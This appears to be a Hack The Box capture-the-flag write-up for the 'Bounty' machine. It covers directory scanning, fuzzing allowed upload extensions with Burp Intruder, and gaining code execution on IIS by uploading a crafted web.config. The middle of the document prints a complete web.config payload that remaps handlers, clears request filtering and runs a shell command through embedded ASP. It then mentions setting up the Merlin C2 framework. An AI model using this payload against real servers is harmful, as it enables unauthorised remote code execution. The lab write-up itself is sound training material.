Hack the box write-up: Bounty
Nmap result:
After the initial scan, I saw that only port 80 was open, so I ran a directory scan with gobuster:
gobuster dir -u http://10.129.161.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx
It looks like it's unstable, but I found transfer.aspx.
File server found!
Let's test which file extensions the upload form accepts, using Burp Suite:
Intercept > attach a file and upload > send the request to Repeater > observe the response.
Make an extension list like this (one extension per line).
Send the request to Intruder > Clear § > mark the file extension in the uploaded filename as the payload position.
Go to Payloads > Payload Options > Load > select the extension list file.
Start Attack.
Only one response had a Content-Length of 1350: the .config extension. Its response body shows that the file was uploaded successfully, while every other extension was rejected.
Uploading a web.config file to an IIS server can bypass the upload restriction and turn it into code execution: IIS honours a web.config placed in any served directory, so the file can re-map the .config extension onto the classic ASP handler and disable request filtering, and ASP code hidden in an XML comment at the end of the same file is then executed when web.config is requested:
gobuster also showed an UploadedFiles directory.
I uploaded the web.config file and requested it from the UploadedFiles directory.
It shows 3, so the server executed the ASP code embedded in web.config instead of serving it as a file, which is exactly what the exploit is supposed to do.
ASP remote code execution template:
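As an added example (this is not a screenshot from the write-up, and not code from Hack The Box or Merlin), here is the web.config payload in the form popularised by Soroush Dalili's IIS upload research, with the ASP section extended to run a command. The handler mapping makes IIS run *.config files through the classic ASP ISAPI (asp.dll), the request-filtering section removes .config from the blocked extensions and web.config from the hidden segments so the file can be requested directly, and the ASP code lives inside an XML comment so the file is still valid XML for the configuration parser. The command cmd /c whoami is an assumption for illustration; the 1+2 is what produces the 3 seen in the response.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <!-- Map *.config onto the classic ASP ISAPI so IIS executes this file instead of refusing it -->
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <!-- Request filtering normally blocks .config and hides web.config; clear both lists -->
        <fileExtensions allowUnlisted="true">
          <clear />
        </fileExtensions>
        <hiddenSegments>
          <clear />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<% Response.write("-"&"->")
' Everything from here on is inside an XML comment, so the config parser ignores it;
' the split string above emits a closing comment marker into the HTTP response so the
' output below is visible in the browser.
Response.write(1+2)
' Assumed command for illustration (not part of the original page); replace as needed.
Set oShell = CreateObject("WScript.Shell")
Set oExec = oShell.Exec("cmd /c whoami")
Response.write("<br>" & oExec.StdOut.ReadAll())
Response.write("<!-"&"-")
%>
-->
```

The file must be named exactly web.config and land in a directory that IIS serves (here UploadedFiles); the check is a GET to http://10.129.161.191/UploadedFiles/web.config, which should return 3 followed by the command output. If the response is an HTTP 500 instead, the application pool is usually locked so that site-level web.config files may not override handlers or request filtering, and this technique will not work on that host.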
Since I confirmed that it allows code execution, I'm going to use Merlin.
Merlin is a post-exploitation command and control framework written in Go, comparable to Metasploit.
We need a server certificate inside the merlin/data/x509 directory.
To generate one, execute the command:
After the server certificate and key are generated, run the server by typing "go run main.go".
For some reason, the box kept shutting down, so I decided to stop working on it.
Full walkthrough is available from here: https://medium.com/@v1per/bounty-hackthebox-writeup-5b79a79e6de9